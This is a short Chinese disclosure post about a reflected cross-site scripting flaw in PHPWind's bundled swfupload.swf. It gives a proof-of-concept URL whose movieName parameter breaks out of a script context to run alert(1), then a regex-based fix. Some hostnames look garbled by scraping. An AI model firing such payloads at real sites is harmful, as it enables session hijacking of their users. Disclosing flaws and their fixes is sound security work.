直接给详细信息
1、先来说下http://HdhCmsTestphpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf 这个flash文件存在 漏洞 ,其实看文件名称是不是很似曾相识?还记得wordpress之前的flash文件漏洞么?
不知道的看这边:
http://packetstormsecurity测试数据/files/118059/SWF-Upload-Cross-Site-Scripting. html
2、所以我们连反编译的力气都省去了,直接构造poc:
http://HdhCmsTestphpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//
是不是触发了?
http://HdhCmsTestphpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//
修复方案:
1、这个我记得后来的修复方法应该是:
var replacePattern:* = /[^a-zA-Z0-9_]/g;
this.movieName = this.movieName.replace(replacePattern, "");
最好是直接使用修复过的版本
查看更多关于PHPWind flash xss 0day [1] - 网站安全 - 自学php的详细内容...